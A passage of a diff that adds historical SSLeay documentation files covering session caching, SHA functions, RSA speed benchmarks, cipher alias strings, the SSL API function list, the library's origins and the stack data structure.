+This is a special case that clears everything.
+
+As a final comment, a 'session' is not enough to establish a new
+connection.  If a session has timed out, a certificate and private key
+need to have been associated with the SSL structure.
+SSL_copy_session_id(SSL *to,SSL *from); will copy not only the session
+strucutre but also the private key and certificate associated with
+'from'.
+
+EXAMPLES.
+
+So lets play at being a weird SSL server.
+
+/* setup a context */
+ctx=SSL_CTX_new();
+
+/* Lets load some session from binary into the cache, why one would do
+ * this is not toally clear, but passing between programs does make sense
+ * Perhaps you are using 4096 bit keys and are happy to keep them
+ * valid for a week, to avoid the RSA overhead of 15 seconds, I'm not toally
+ * sure, perhaps this is a process called from an SSL inetd and this is being 
+ * passed to the application. */
+session=d2i_SSL_SESSION(....)
+SSL_CTX_add_session(ctx,session);
+
+/* Lets even add a session from a file */
+session=PEM_read_SSL_SESSION(....)
+SSL_CTX_add_session(ctx,session);
+
+/* create a new SSL structure */
+ssl=SSL_new(ctx);
+
+/* At this point we want to be able to 'create' new session if
+ * required, so we need a certificate and RSAkey. */
+SSL_use_RSAPrivateKey_file(ssl,...)
+SSL_use_certificate_file(ssl,...)
+
+/* Now since we are a server, it make little sence to load a session against
+ * the ssl strucutre since a SSL_accept() will either create a new session or
+ * grab an existing one from the cache. */
+
+/* grab a socket descriptor */
+fd=accept(...);
+
+/* associated it with the ssl strucutre */
+SSL_set_fd(ssl,fd);
+
+SSL_accept(ssl); /* 'do' SSL using out cert and RSA key */
+
+/* Lets print out the session details or lets save it to a file,
+ * perhaps with a secret key cipher, so that we can pass it to the FBI
+ * when they want to decode the session :-).  While we have RSA
+ * this does not matter much but when I do SSLv3, this will allow a mechanism
+ * for the server/client to record the information needed to decode
+ * the traffic that went over the wire, even when using Diffie-Hellman */
+PEM_write_SSL_SESSION(SSL_get_session(ssl),stdout,....)
+
+Lets 'connect' back to the caller using the same session id.
+
+ssl2=SSL_new(ctx);
+fd2=connect(them);
+SSL_set_fd(ssl2,fd2);
+SSL_set_session(ssl2,SSL_get_session(ssl));
+SSL_connect(ssl2);
+
+/* what the hell, lets accept no more connections using this session */
+SSL_CTX_remove_session(SSL_get_SSL_CTX(ssl),SSL_get_session(ssl));
+
+/* we could have just as easily used ssl2 since they both are using the
+ * same session.
+ * You will note that both ssl and ssl2 are still using the session, and
+ * the SSL_SESSION structure will be free()ed when both ssl and ssl2
+ * finish using the session.  Also note that you could continue to initiate
+ * connections using this session by doing SSL_get_session(ssl) to get the
+ * existing session, but SSL_accept() will not be able to find it to
+ * use for incoming connections.
+ * Of corse, the session will timeout at the far end and it will no
+ * longer be accepted after a while.  The time and timeout are ignored except
+ * by SSL_accept(). */
+
+/* Since we have had our server running for 10 weeks, and memory is getting
+ * short, perhaps we should clear the session cache to remove those
+ * 100000 session entries that have expired.  Some may consider this
+ * a memory leak :-) */
+
+SSL_CTX_flush_sessions(ctx,time(NULL));
+
+/* Ok, after a bit more time we wish to flush all sessions from the cache
+ * so that all new connections will be authenticated and incure the
+ * public key operation overhead */
+
+SSL_CTX_flush_sessions(ctx,0);
+
+/* As a final note, to copy everything to do with a SSL, use */
+SSL_copy_session_id(SSL *to,SSL *from);
+/* as this also copies the certificate and RSA key so new session can
+ * be established using the same details */
+
+
+==== sha.doc ========================================================
+
+The SHA (Secure Hash Algorithm) library.
+SHA is a message digest algorithm that can be used to condense an arbitrary
+length message down to a 20 byte hash.  The functions all need to be passed
+a SHA_CTX which is used to hold the SHA context during multiple SHA_Update()
+function calls.  The normal method of use for this library is as follows
+This library contains both SHA and SHA-1 digest algorithms.  SHA-1 is
+an update to SHA (which should really be called SHA-0 now) which
+tweaks the algorithm slightly.  The SHA-1 algorithm is used by simply
+using SHA1_Init(), SHA1_Update(), SHA1_Final() and SHA1() instead of the
+SHA*() calls
+
+SHA_Init(...);
+SHA_Update(...);
+...
+SHA_Update(...);
+SHA_Final(...);
+
+This library requires the inclusion of 'sha.h'.
+
+The functions are as follows:
+
+void SHA_Init(
+SHA_CTX *c);
+	This function needs to be called to initiate a SHA_CTX structure for
+	use.
+	
+void SHA_Update(
+SHA_CTX *c;
+unsigned char *data;
+unsigned long len);
+	This updates the message digest context being generated with 'len'
+	bytes from the 'data' pointer.  The number of bytes can be any
+	length.
+
+void SHA_Final(
+unsigned char *md;
+SHA_CTX *c;
+	This function is called when a message digest of the data digested
+	with SHA_Update() is wanted.  The message digest is put in the 'md'
+	array and is SHA_DIGEST_LENGTH (20) bytes long.
+
+unsigned char *SHA(
+unsigned char *d;
+unsigned long n;
+unsigned char *md;
+	This function performs a SHA_Init(), followed by a SHA_Update()
+	followed by a SHA_Final() (using a local SHA_CTX).
+	The resulting digest is put into 'md' if it is not NULL.
+	Regardless of the value of 'md', the message
+	digest is returned from the function.  If 'md' was NULL, the message
+	digest returned is being stored in a static structure.
+	
+
+==== speed.doc ========================================================
+
+To get an idea of the performance of this library, use
+ssleay speed
+
+perl util/sp-diff.pl file1 file2
+
+will print out the relative differences between the 2 files which are
+expected to be the output from the speed program.
+
+The performace of the library is very dependant on the Compiler
+quality and various flags used to build.
+
+---
+
+These are some numbers I did comparing RSAref and SSLeay on a Pentium 100.
+[ These numbers are all out of date, as of SSL - 0.6.1 the RSA
+operations are about 2 times faster, so check the version number ]
+
+RSA performance.
+
+SSLeay 0.6.0
+Pentium 100, 32meg, Windows NT Workstation 3.51
+linux - gcc v 2.7.0 -O3 -fomit-frame-pointer -m486
+and
+Windows NT  - Windows NT 3.51 - Visual C++ 4.1   - 586 code + 32bit assember
+Windows 3.1 - Windows NT 3.51 - Visual C++ 1.52c - 286 code + 32bit assember
+NT Dos Shell- Windows NT 3.51 - Visual C++ 1.52c - 286 code + 16bit assember
+
+Times are how long it takes to do an RSA private key operation.
+
+	       512bits 1024bits
+-------------------------------
+SSLeay NT dll	0.042s   0.202s see above
+SSLeay linux	0.046s   0.218s	Assember inner loops (normal build) 
+SSLeay linux	0.067s   0.380s Pure C code with BN_LLONG defined
+SSLeay W3.1 dll	0.108s 	 0.478s see above
+SSLeay linux	0.109s   0.713s C without BN_LLONG.
+RSAref2.0 linux	0.149s   0.936s
+SSLeay MS-DOS	0.197s   1.049s see above
+
+486DX66, 32meg, Windows NT Server 3.51
+	       512bits 1024bits
+-------------------------------
+SSLeay NT dll   0.084s	 0.495s	<- SSLeay 0.6.3
+SSLeay NT dll   0.154s   0.882s
+SSLeay W3.1 dll 0.335s   1.538s
+SSLeay MS-DOS	0.490s   2.790s
+
+What I find cute is that I'm still faster than RSAref when using standard C,
+without using the 'long long' data type :-), %35 faster for 512bit and we
+scale up to 3.2 times faster for the 'default linux' build.  I should mention
+that people should 'try' to use either x86-lnx.s (elf), x86-lnxa.s or
+x86-sol.s for any x86 based unix they are building on.  The only problems
+with be with syntax but the performance gain is quite large, especially for
+servers.  The code is very simple, you just need to modify the 'header'.
+
+The message is, if you are stuck using RSAref, the RSA performance will be
+bad. Considering the code was compiled for a pentium, the 486DX66 number
+would indicate 'Use RSAref and turn you Pentium 100 into a 486DX66' :-). 
+[ As of verson 0.6.1, it would be correct to say 'turn you pentium 100
+ into a 486DX33' :-) ]
+
+I won't tell people if the DLL's are using RSAref or my stuff if no-one
+asks :-).
+
+eric
+
+PS while I know I could speed things up further, I will probably not do
+   so due to the effort involved.  I did do some timings on the
+   SSLeay bignum format -> RSAref number format conversion that occurs
+   each time RSAref is used by SSLeay, and the numbers are trivial.
+   0.00012s a call for 512bit vs 0.149s for the time spent in the function.
+   0.00018s for 1024bit vs 0.938s.  Insignificant.
+   So the 'way to go', to support faster RSA libraries, if people are keen,
+   is to write 'glue' code in a similar way that I do for RSAref and send it
+   to me :-).
+   My base library still has the advantage of being able to operate on 
+   any size numbers, and is not that far from the performance from the
+   leaders in the field. (-%30?)
+   [ Well as of 0.6.1 I am now the leader in the filed on x86 (we at
+     least very close :-) ]
+
+   I suppose I should also mention some other numbers RSAref numbers, again
+   on my Pentium.
+		DES CBC		EDE-DES		MD5
+   RSAref linux	 830k/s		 302k/s		4390k/s
+   SSLeay linux  855k/s          319k/s        10025k/s
+   SSLeay NT	1158k/s		 410k/s	       10470k/s
+   SSLeay w31	 378k/s		 143k/s         2383k/s (fully 16bit)
+
+   Got to admit that Visual C++ 4.[01] is a damn fine compiler :-)
+--
+Eric Young                  | BOOL is tri-state according to Bill Gates.
+AARNet: eay@cryptsoft.com   | RTFM Win32 GetMessage().
+
+
+
+
+==== ssl-ciph.doc ========================================================
+
+This is a quick high level summery of how things work now.
+
+Each SSLv2 and SSLv3 cipher is composed of 4 major attributes plus a few extra
+minor ones.
+
+They are 'The key exchange algorithm', which is RSA for SSLv2 but can also
+be Diffle-Hellman for SSLv3.
+
+An 'Authenticion algorithm', which can be RSA, Diffle-Helman, DSS or
+none.
+
+The cipher
+
+The MAC digest.
+
+A cipher can also be an export cipher and is either an SSLv2 or a
+SSLv3 ciphers.
+
+To specify which ciphers to use, one can either specify all the ciphers,
+one at a time, or use 'aliases' to specify the preference and order for
+the ciphers.
+
+There are a large number of aliases, but the most importaint are
+kRSA, kDHr, kDHd and kDHE for key exchange types.
+
+aRSA, aDSS, aNULL and aDH for authentication
+DES, 3DES, RC4, RC2, IDEA and eNULL for ciphers
+MD5, SHA0 and SHA1 digests
+
+Now where this becomes interesting is that these can be put together to
+specify the order and ciphers you wish to use.
+
+To speed this up there are also aliases for certian groups of ciphers.
+The main ones are
+SSLv2	- all SSLv2 ciphers
+SSLv3	- all SSLv3 ciphers
+EXP	- all export ciphers
+LOW	- all low strngth ciphers (no export ciphers, normally single DES)
+MEDIUM	- 128 bit encryption
+HIGH	- Triple DES
+
+These aliases can be joined in a : separated list which specifies to
+add ciphers, move them to the current location and delete them.
+
+A simpler way to look at all of this is to use the 'ssleay ciphers -v' command.
+The default library cipher spec is
+!ADH:RC4+RSA:HIGH:MEDIUM:LOW:EXP:+SSLv2:+EXP
+which means, first, remove from consideration any ciphers that do not
+authenticate.  Next up, use ciphers using RC4 and RSA.  Next include the HIGH,
+MEDIUM and the LOW security ciphers.  Finish up by adding all the export
+ciphers on the end, then 'pull' all the SSLv2 and export ciphers to
+the end of the list.
+
+The results are
+$ ssleay ciphers -v '!ADH:RC4+RSA:HIGH:MEDIUM:LOW:EXP:+SSLv2:+EXP'
+
+RC4-SHA                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=SHA1
+RC4-MD5                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5 
+EDH-RSA-DES-CBC3-SHA    SSLv3 Kx=DH       Au=RSA  Enc=3DES(168) Mac=SHA1
+EDH-DSS-DES-CBC3-SHA    SSLv3 Kx=DH       Au=DSS  Enc=3DES(168) Mac=SHA1
+DES-CBC3-SHA            SSLv3 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=SHA1
+IDEA-CBC-MD5            SSLv3 Kx=RSA      Au=RSA  Enc=IDEA(128) Mac=SHA1
+EDH-RSA-DES-CBC-SHA     SSLv3 Kx=DH       Au=RSA  Enc=DES(56)   Mac=SHA1
+EDH-DSS-DES-CBC-SHA     SSLv3 Kx=DH       Au=DSS  Enc=DES(56)   Mac=SHA1
+DES-CBC-SHA             SSLv3 Kx=RSA      Au=RSA  Enc=DES(56)   Mac=SHA1
+DES-CBC3-MD5            SSLv2 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=MD5 
+DES-CBC-MD5             SSLv2 Kx=RSA      Au=RSA  Enc=DES(56)   Mac=MD5 
+IDEA-CBC-MD5            SSLv2 Kx=RSA      Au=RSA  Enc=IDEA(128) Mac=MD5 
+RC2-CBC-MD5             SSLv2 Kx=RSA      Au=RSA  Enc=RC2(128)  Mac=MD5 
+RC4-MD5                 SSLv2 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5 
+EXP-EDH-RSA-DES-CBC     SSLv3 Kx=DH(512)  Au=RSA  Enc=DES(40)   Mac=SHA1 export
+EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512)  Au=DSS  Enc=DES(40)   Mac=SHA1 export
+EXP-DES-CBC-SHA         SSLv3 Kx=RSA(512) Au=RSA  Enc=DES(40)   Mac=SHA1 export
+EXP-RC2-CBC-MD5         SSLv3 Kx=RSA(512) Au=RSA  Enc=RC2(40)   Mac=MD5  export
+EXP-RC4-MD5             SSLv3 Kx=RSA(512) Au=RSA  Enc=RC4(40)   Mac=MD5  export
+EXP-RC2-CBC-MD5         SSLv2 Kx=RSA(512) Au=RSA  Enc=RC2(40)   Mac=MD5  export
+EXP-RC4-MD5             SSLv2 Kx=RSA(512) Au=RSA  Enc=RC4(40)   Mac=MD5  export
+
+I would recoment people use the 'ssleay ciphers -v "text"'
+command to check what they are going to use.
+
+Anyway, I'm falling asleep here so I'll do some more tomorrow.
+
+eric
+
+==== ssl.doc ========================================================
+
+SSL_CTX_sessions(SSL_CTX *ctx) - the session-id hash table.
+
+/* Session-id cache stats */
+SSL_CTX_sess_number
+SSL_CTX_sess_connect
+SSL_CTX_sess_connect_good
+SSL_CTX_sess_accept
+SSL_CTX_sess_accept_good
+SSL_CTX_sess_hits
+SSL_CTX_sess_cb_hits
+SSL_CTX_sess_misses
+SSL_CTX_sess_timeouts
+
+/* Session-id application notification callbacks */
+SSL_CTX_sess_set_new_cb
+SSL_CTX_sess_get_new_cb
+SSL_CTX_sess_set_get_cb
+SSL_CTX_sess_get_get_cb
+
+/* Session-id cache operation mode */
+SSL_CTX_set_session_cache_mode
+SSL_CTX_get_session_cache_mode
+
+/* Set default timeout values to use. */
+SSL_CTX_set_timeout
+SSL_CTX_get_timeout
+
+/* Global  SSL initalisation informational callback */
+SSL_CTX_set_info_callback
+SSL_CTX_get_info_callback
+SSL_set_info_callback
+SSL_get_info_callback
+
+/* If the SSL_accept/SSL_connect returned with -1, these indicate when
+ * we should re-call *.
+SSL_want
+SSL_want_nothing
+SSL_want_read
+SSL_want_write
+SSL_want_x509_lookup
+
+/* Where we are in SSL initalisation, used in non-blocking, perhaps
+ * have a look at ssl/bio_ssl.c */
+SSL_state
+SSL_is_init_finished
+SSL_in_init
+SSL_in_connect_init
+SSL_in_accept_init
+
+/* Used to set the 'inital' state so SSL_in_connect_init and SSL_in_accept_init
+ * can be used to work out which function to call. */
+SSL_set_connect_state
+SSL_set_accept_state
+
+/* Where to look for certificates for authentication */
+SSL_set_default_verify_paths /* calles SSL_load_verify_locations */
+SSL_load_verify_locations
+
+/* get info from an established connection */
+SSL_get_session
+SSL_get_certificate
+SSL_get_SSL_CTX
+
+SSL_CTX_new
+SSL_CTX_free
+SSL_new
+SSL_clear
+SSL_free
+
+SSL_CTX_set_cipher_list
+SSL_get_cipher
+SSL_set_cipher_list
+SSL_get_cipher_list
+SSL_get_shared_ciphers
+
+SSL_accept
+SSL_connect
+SSL_read
+SSL_write
+
+SSL_debug
+
+SSL_get_read_ahead
+SSL_set_read_ahead
+SSL_set_verify
+
+SSL_pending
+
+SSL_set_fd
+SSL_set_rfd
+SSL_set_wfd
+SSL_set_bio
+SSL_get_fd
+SSL_get_rbio
+SSL_get_wbio
+
+SSL_use_RSAPrivateKey
+SSL_use_RSAPrivateKey_ASN1
+SSL_use_RSAPrivateKey_file
+SSL_use_PrivateKey
+SSL_use_PrivateKey_ASN1
+SSL_use_PrivateKey_file
+SSL_use_certificate
+SSL_use_certificate_ASN1
+SSL_use_certificate_file
+
+ERR_load_SSL_strings
+SSL_load_error_strings
+
+/* human readable version of the 'state' of the SSL connection. */
+SSL_state_string
+SSL_state_string_long
+/* These 2 report what kind of IO operation the library was trying to
+ * perform last.  Probably not very usefull. */
+SSL_rstate_string
+SSL_rstate_string_long
+
+SSL_get_peer_certificate
+
+SSL_SESSION_new
+SSL_SESSION_print_fp
+SSL_SESSION_print
+SSL_SESSION_free
+i2d_SSL_SESSION
+d2i_SSL_SESSION
+
+SSL_get_time
+SSL_set_time
+SSL_get_timeout
+SSL_set_timeout
+SSL_copy_session_id
+SSL_set_session
+SSL_CTX_add_session
+SSL_CTX_remove_session
+SSL_CTX_flush_sessions
+
+BIO_f_ssl
+
+/* used to hold information as to why a certificate verification failed */
+SSL_set_verify_result
+SSL_get_verify_result
+
+/* can be used by the application to associate data with an SSL structure.
+ * It needs to be 'free()ed' by the application */
+SSL_set_app_data
+SSL_get_app_data
+
+/* The following all set values that are kept in the SSL_CTX but
+ * are used as the default values when an SSL session is created.
+ * They are over writen by the relevent SSL_xxxx functions */
+
+/* SSL_set_verify */
+void SSL_CTX_set_default_verify
+
+/* This callback, if set, totaly overrides the normal SSLeay verification
+ * functions and should return 1 on success and 0 on failure */
+void SSL_CTX_set_cert_verify_callback
+
+/* The following are the same as the equivilent SSL_xxx functions.
+ * Only one copy of this information is kept and if a particular
+ * SSL structure has a local override, it is totally separate structure.
+ */
+int SSL_CTX_use_RSAPrivateKey
+int SSL_CTX_use_RSAPrivateKey_ASN1
+int SSL_CTX_use_RSAPrivateKey_file
+int SSL_CTX_use_PrivateKey
+int SSL_CTX_use_PrivateKey_ASN1
+int SSL_CTX_use_PrivateKey_file
+int SSL_CTX_use_certificate
+int SSL_CTX_use_certificate_ASN1
+int SSL_CTX_use_certificate_file
+
+
+==== ssl_ctx.doc ========================================================
+
+This is now a bit dated, quite a few of the SSL_ functions could be
+SSL_CTX_ functions.  I will update this in the future. 30 Aug 1996
+
+From eay@orb.mincom.oz.au Mon Dec 11 21:37:08 1995
+Received: by orb.mincom.oz.au id AA00696
+  (5.65c/IDA-1.4.4 for eay); Mon, 11 Dec 1995 11:37:08 +1000
+Date: Mon, 11 Dec 1995 11:37:08 +1000 (EST)
+From: Eric Young <eay@mincom.oz.au>
+X-Sender: eay@orb
+To: sameer <sameer@c2.org>
+Cc: Eric Young <eay@mincom.oz.au>
+Subject: Re: PEM_readX509 oesn't seem to be working
+In-Reply-To: <199512110102.RAA12521@infinity.c2.org>
+Message-Id: <Pine.SOL.3.91.951211112115.28608D-100000@orb>
+Mime-Version: 1.0
+Content-Type: TEXT/PLAIN; charset=US-ASCII
+Status: RO
+X-Status: 
+
+On Sun, 10 Dec 1995, sameer wrote:
+> 	OK, that's solved. I've found out that it is saying "no
+> certificate set" in SSL_accept because s->conn == NULL
+> so there is some place I need to initialize s->conn that I am
+> not initializing it.
+
+The full order of things for a server should be.
+
+ctx=SSL_CTX_new();
+
+/* The next line should not really be using ctx->cert but I'll leave it 
+ * this way right now... I don't want a X509_ routine to know about an SSL
+ * structure, there should be an SSL_load_verify_locations... hmm, I may 
+ * add it tonight.
+ */
+X509_load_verify_locations(ctx->cert,CAfile,CApath);
+
+/* Ok now for each new connection we do the following */
+con=SSL_new(ctx);
+SSL_set_fd(con,s);
+SSL_set_verify(con,verify,verify_callback);
+
+/* set the certificate and private key to use. */
+SSL_use_certificate_ASN1(con,X509_certificate);
+SSL_use_RSAPrivateKey_ASN1(con,RSA_private_key);
+
+SSL_accept(con);
+
+SSL_read(con)/SSL_write(con);
+
+There is a bit more than that but that is basically the structure.
+
+Create a context and specify where to lookup certificates.
+
+foreach connection
+	{
+	create a SSL structure
+	set the certificate and private key
+	do a SSL_accept
+	
+	we should now be ok
+	}
+
+eric
+--
+Eric Young                  | Signature removed since it was generating
+AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
+
+
+
+==== ssleay.doc ========================================================
+
+SSLeay: a cryptographic kitchen sink.
+
+1st December 1995
+Way back at the start of April 1995, I was looking for a mindless
+programming project.  A friend of mine (Tim Hudson) said "why don't you do SSL,
+it has DES encryption in it and I would not mind using it in a SSL telnet".
+While it was true I had written a DES library in previous years, litle
+did I know what an expansive task SSL would turn into.
+
+First of all, the SSL protocol contains DES encryption.  Well and good.  My
+DES library was fast and portable.  It also contained the RSA's RC4 stream
+cipher.  Again, not a problem, some-one had just posted to sci.crypt
+something that was claimed to be RC4.  It also contained IDEA, I had the
+specifications, not a problem to implement.  MD5, an RFC, trivial, at most
+I could spend a week or so trying to see if I could speed up the
+implementation.  All in all a nice set of ciphers.
+Then the first 'expantion of the scope', RSA public key
+encryption.  Since I did not knowing a thing about public key encryption
+or number theory, this appeared quite a daunting task.  Just writing a
+big number library would be problomatic in itself, let alone making it fast.
+At this point the scope of 'implementing SSL' expands eponentialy.
+First of all, the RSA private keys  were being kept in ASN.1 format.
+Thankfully the RSA PKCS series of documents explains this format.  So I now
+needed to be able to encode and decode arbitary ASN.1 objects.  The Public
+keys were embeded in X509 certificates.  Hmm... these are not only
+ASN.1 objects but they make up a heirachy of authentication.  To
+authenticate a X509 certificate one needs to retrieve it's issuers
+certificate etc etc.  Hmm..., so I also need to implement some kind
+of certificate management software.  I would also have to implement
+software to authenticate certificates.  At this point the support code made
+the SSL part of my library look quite small.
+Around this time, the first version of SSLeay was released.
+
+Ah, but here was the problem, I was not happy with the code so far.  As may
+have become obvious, I had been treating all of this as a learning
+exersize, so I have completely written the library myself.  As such, due
+to the way it had grown like a fungus, much of the library was not
+'elagent' or neat.  There were global and static variables all over the
+place, the SSL part did not even handle non-blocking IO.
+The Great rewrite began.
+
+As of this point in time, the 'Great rewrite' has almost finished.  So what
+follows is an approximate list of what is actually SSLeay 0.5.0
+
+/********* This needs to be updated for 0.6.0+ *************/
+
+---
+The library contains the following routines.  Please note that most of these
+functions are not specfic for SSL or any other particular cipher
+implementation.  I have tried to make all the routines as general purpose
+as possible.  So you should not think of this library as an SSL
+implemtation, but rather as a library of cryptographic functions
+that also contains SSL.  I refer to each of these function groupings as
+libraries since they are often capable of functioning as independant
+libraries
+
+First up, the general ciphers and message digests supported by the library.
+
+MD2	rfc???, a standard 'by parts' interface to this algorithm.
+MD5	rfc???, the same type of interface as for the MD2 library except a
+	different algorithm.
+SHA	THe Secure Hash Algorithm.  Again the same type of interface as
+	MD2/MD5 except the digest is 20 bytes.
+SHA1	The 'revised' version of SHA.  Just about identical to SHA except
+	for one tweak of an inner loop.
+DES	This is my libdes library that has been floating around for the last
+	few years.  It has been enhanced for no other reason than completeness.
+	It now supports ecb, cbc, cfb, ofb, cfb64, ofb64 in normal mode and
+	triple DES modes of ecb, cbc, cfb64 and ofb64.  cfb64 and ofb64 are
+	functional interfaces to the 64 bit modes of cfb and ofb used in
+	such a way thay they function as single character interfaces.
+RC4	The RSA Inc. stream cipher.
+RC2	The RSA Inc. block cipher.
+IDEA	An implmentation of the IDEA cipher, the library supports ecb, cbc,
+	cfb64 and ofb64 modes of operation.
+
+Now all the above mentioned ciphers and digests libraries support high
+speed, minimal 'crap in the way' type interfaces.  For fastest and
+lowest level access, these routines should be used directly.
+
+Now there was also the matter of public key crypto systems.  These are
+based on large integer arithmatic.
+
+BN	This is my large integer library.  It supports all the normal
+	arithmentic operations.  It uses malloc extensivly and as such has
+	no limits of the size of the numbers being manipulated.  If you
+	wish to use 4000 bit RSA moduli, these routines will handle it.
+	This library also contains routines to 'generate' prime numbers and
+	to test for primality.  The RSA and DH libraries sit on top of this
+	library.  As of this point in time, I don't support SHA, but
+	when I do add it, it will just sit on top of the routines contained
+	in this library.
+RSA	This implements the RSA public key algorithm.  It also contains
+	routines that will generate a new private/public key pair.
+	All the RSA functions conform to the PKCS#1 standard.
+DH	This is an implementation of the
+	Diffie-Hellman protocol.  There are all the require routines for
+	the protocol, plus extra routines that can be used to generate a
+	strong prime for use with a specified generator.  While this last
+	routine is not generally required by applications implementing DH,
+	It is present for completeness and because I thing it is much
+	better to be able to 'generate' your own 'magic' numbers as oposed
+	to using numbers suplied by others.  I conform to the PKCS#3
+	standard where required.
+
+You may have noticed the preceeding section mentions the 'generation' of
+prime numbers.  Now this requries the use of 'random numbers'. 
+
+RAND	This psuedo-random number library is based on MD5 at it's core
+	and a large internal state (2k bytes).  Once you have entered enough
+	seed data into this random number algorithm I don't feel
+	you will ever need to worry about it generating predictable output.
+	Due to the way I am writing a portable library, I have left the
+	issue of how to get good initial random seed data upto the
+	application but I do have support routines for saving and loading a
+	persistant random number state for use between program runs.
+	
+Now to make all these ciphers easier to use, a higher level
+interface was required.  In this form, the same function would be used to
+encrypt 'by parts', via any one of the above mentioned ciphers.
+
+EVP	The Digital EnVeloPe library is quite large.  At it's core are
+	function to perform encryption and decryption by parts while using
+	an initial parameter to specify which of the 17 different ciphers
+	or 4 different message digests to use.  On top of these are implmented
+	the digital signature functions, sign, verify, seal and open.
+	Base64 encoding of binary data is also done in this library.
+
+PEM	rfc???? describe the format for Privacy Enhanced eMail.
+	As part of this standard, methods of encoding digital enveloped
+	data is an ascii format are defined.  As such, I use a form of these
+	to encode enveloped data.  While at this point in time full support
+	for PEM has not been built into the library, a minimal subset of
+	the secret key and Base64 encoding is present.  These reoutines are
+	mostly used to Ascii encode binary data with a 'type' associated
+	with it and perhaps details of private key encryption used to
+	encrypt the data.
+	
+PKCS7	This is another Digital Envelope encoding standard which uses ASN.1
+	to encode the data.  At this point in time, while there are some
+	routines to encode and decode this binary format, full support is
+	not present.
+	
+As Mentioned, above, there are several different ways to encode
+data structures.
+
+ASN1	This library is more a set of primatives used to encode the packing
+	and unpacking of data structures.  It is used by the X509
+	certificate standard and by the PKCS standards which are used by
+	this library.  It also contains routines for duplicating and signing
+	the structures asocisated with X509.
+	
+X509	The X509 library contains routines for packing and unpacking,
+	verifying and just about every thing else you would want to do with
+	X509 certificates.
+
+PKCS7	PKCS-7 is a standard for encoding digital envelope data
+	structures.  At this point in time the routines will load and save
+	DER forms of these structees.  They need to be re-worked to support
+	the BER form which is the normal way PKCS-7 is encoded.  If the
+	previous 2 sentances don't make much sense, don't worry, this
+	library is not used by this version of SSLeay anyway.
+
+OBJ	ASN.1 uses 'object identifiers' to identify objects.  A set of
+	functions were requred to translate from ASN.1 to an intenger, to a
+	character string.  This library provieds these translations
+	
+Now I mentioned an X509 library.  X509 specified a hieachy of certificates
+which needs to be traversed to authenticate particular certificates.
+
+METH	This library is used to push 'methods' of retrieving certificates
+	into the library.  There are some supplied 'methods' with SSLeay
+	but applications can add new methods if they so desire.
+	This library has not been finished and is not being used in this
+	version.
+	
+Now all the above are required for use in the initial point of this project.
+
+SSL	The SSL protocol.  This is a full implmentation of SSL v 2.  It
+	support both server and client authentication.  SSL v 3 support
+	will be added when the SSL v 3 specification is released in it's
+	final form.
+
+Now quite a few of the above mentioned libraries rely on a few 'complex'
+data structures.  For each of these I have a library.
+
+Lhash	This is a hash table library which is used extensivly.
+
+STACK	An implemetation of a Stack data structure.
+
+BUF	A simple character array structure that also support a function to
+	check that the array is greater that a certain size, if it is not,
+	it is realloced so that is it.
+	
+TXT_DB	A simple memory based text file data base.  The application can specify
+	unique indexes that will be enforced at update time.
+
+CONF	Most of the programs written for this library require a configuration
+	file.  Instead of letting programs constantly re-implment this
+	subsystem, the CONF library provides a consistant and flexable
+	interface to not only configuration files but also environment
+	variables.
+
+But what about when something goes wrong?
+The one advantage (and perhaps disadvantage) of all of these
+functions being in one library was the ability to implement a
+single error reporting system.
+	
+ERR	This library is used to report errors.  The error system records
+	library number, function number (in the library) and reason
+	number.  Multiple errors can be reported so that an 'error' trace
+	is created.  The errors can be printed in numeric or textual form.
+
+
+==== ssluse.doc ========================================================
+
+We have an SSL_CTX which contains global information for lots of
+SSL connections.  The session-id cache and the certificate verificate cache.
+It also contains default values for use when certificates are used.
+
+SSL_CTX
+	default cipher list
+	session-id cache
+	certificate cache
+	default session-id timeout period
+	New session-id callback
+	Required session-id callback
+	session-id stats
+	Informational callback
+	Callback that is set, overrides the SSLeay X509 certificate
+	  verification
+	The default Certificate/Private Key pair
+	Default read ahead mode.
+	Default verify mode and verify callback.  These are not used
+	  if the over ride callback mentioned above is used.
+	
+Each SSL can have the following defined for it before a connection is made.
+
+Certificate
+Private key
+Ciphers to use
+Certificate verify mode and callback
+IO object to use in the comunication.
+Some 'read-ahead' mode information.
+A previous session-id to re-use.
+
+A connection is made by using SSL_connect or SSL_accept.
+When non-blocking IO is being used, there are functions that can be used
+to determin where and why the SSL_connect or SSL_accept did not complete.
+This information can be used to recall the functions when the 'error'
+condition has dissapeared.
+
+After the connection has been made, information can be retrived about the
+SSL session and the session-id values that have been decided upon.
+The 'peer' certificate can be retrieved.
+
+The session-id values include
+'start time'
+'timeout length'
+
+
+
+==== stack.doc ========================================================
+
+The stack data structure is used to store an ordered list of objects.
+It is basically misnamed to call it a stack but it can function that way
+and that is what I originally used it for.  Due to the way element
+pointers are kept in a malloc()ed array, the most efficient way to use this
+structure is to add and delete elements from the end via sk_pop() and
+sk_push().  If you wish to do 'lookups' sk_find() is quite efficient since
+it will sort the stack (if required) and then do a binary search to lookup 
+the requested item.  This sorting occurs automatically so just sk_push()
+elements on the stack and don't worry about the order.  Do remember that if
+you do a sk_find(), the order of the elements will change.
+
+You should never need to 'touch' this structure directly.
+typedef struct stack_st
+	{
+	unsigned int num;
+	char **data;
+	int sorted;
+
+	unsigned int num_alloc;
+	int (*comp)();
+	} STACK;
+
+'num' holds the number of elements in the stack, 'data' is the array of
+elements.  'sorted' is 1 is the list has been sorted, 0 if not.
+
+num_alloc is the number of 'nodes' allocated in 'data'.  When num becomes
+larger than num_alloc, data is realloced to a larger size.
+If 'comp' is set, it is a function that is used to compare 2 of the items
+in the stack.  The function should return -1, 0 or 1, depending on the
+ordering.
+
+#define sk_num(sk)	((sk)->num)
+#define sk_value(sk,n)	((sk)->data[n])
+
+These 2 macros should be used to access the number of elements in the
+'stack' and to access a pointer to one of the values.
+
+STACK *sk_new(int (*c)());
+	This creates a new stack.  If 'c', the comparison function, is not
+specified, the various functions that operate on a sorted 'stack' will not
+work (sk_find()).  NULL is returned on failure.
+
+void sk_free(STACK *);
+	This function free()'s a stack structure.  The elements in the
+stack will not be freed so one should 'pop' and free all elements from the
+stack before calling this function or call sk_pop_free() instead.
+
+void sk_pop_free(STACK *st; void (*func)());
